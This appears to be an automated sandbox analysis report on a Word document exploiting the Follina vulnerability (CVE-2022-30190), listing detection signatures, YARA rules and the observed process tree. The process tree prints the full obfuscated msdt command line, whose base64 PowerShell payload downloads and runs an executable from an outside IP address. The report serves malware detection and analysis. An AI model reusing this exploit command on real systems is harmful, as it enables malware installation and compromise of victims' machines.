Edit tour
Windows
Analysis Report
20220714 DWG.doc
Overview
General Information
Detection
Follina CVE-2022-30190
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Obfuscated command line found
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Classification
- System is w10x64
- WINWORD.EXE (PID: 6276 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Office16\ WINWORD.EX E" /Automa tion -Embe dding MD5: 0B9AB9B9C4DE429473D6450D4297A123) - MSOSYNC.EXE (PID: 6604 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\M soSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C) - msdt.exe (PID: 7084 cmdline:
C:\Windows \system32\ msdt.exe" ms-msdt:/i d PCWDiagn ostic /ski p force /p aram "IT_R ebrowseFor File=cal?c IT_Launch Method=Con textMenu I T_SelectPr ogram=NotL isted IT_B rowseForFi le=h$(Invo ke-Express ion($(Invo ke-Express ion('[Syst em.Text.En coding]'+[ char]58+[c har]58+'UT F8.GetStri ng([System .Convert]' +[char]58+ [char]58+' FromBase64 String('+[ char]34+'a WV4IChuZXc tb2JqZWN0I HN5c3RlbS5 uZXQud2ViY 2xpZW50KS5 kb3dubG9hZ GZpbGUoImh 0dHA6Ly80N S4xNDEuMjM 3LjE4L0dsb 21ldC5leGU iLCJjOlxwc m9ncmFtZGF 0YVxHbG9tZ XQuZXhlIik 7U3RhcnQtU HJvY2VzcyA iYzpccHJvZ 3JhbWRhdGF cR2xvbWV0L mV4ZSI='+[ char]34+') )'))))i/.. /../../../ ../../../. ./../../.. /../../../ Windows/Sy stem32/mps igstub.exe IT_AutoTr oubleshoot =ts_AUTO MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4) - splwow64.exe (PID: 6808 cmdline:
C:\Windows \splwow64. exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
- csc.exe (PID: 4908 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \q0vyiohn\ q0vyiohn.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 5664 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S216A.tmp" "c:\Users \user\AppD ata\Local\ Temp\q0vyi ohn\CSC143 39BC3D3E94 BA0AEA5453 DEFD3E9E.T MP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 5396 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \ea13q231\ ea13q231.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 5904 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S3EE5.tmp" "c:\Users \user\AppD ata\Local\ Temp\ea13q 231\CSCF24 C6B632D84E A4B9FDE297 80CB1444.T MP" MD5: C09985AE74F0882F208D75DE27770DFA)
- Glomet.exe (PID: 6300 cmdline:
"C:\progra mdata\Glom et.exe" MD5: 7A560CE2C90976F306953F3BF4EFEBF9) - cmd.exe (PID: 7112 cmdline:
CMD.EXE /C SET /A "0 x00^75" MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5492 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 3400 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \llhoph4d\ llhoph4d.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 6992 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SDEDE.tmp" "c:\Users \user\AppD ata\Local\ Temp\llhop h4d\CSCA6D EB1F21B847 AF87589FE9 AEBF81D1.T MP" MD5: C09985AE74F0882F208D75DE27770DFA)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
Click to see the 3 entries |
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry value created: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 29_2_00405A19 | |
Source: | Code function: | 29_2_004065CE | |
Source: | Code function: | 29_2_004027AA |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | Memory has grown: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |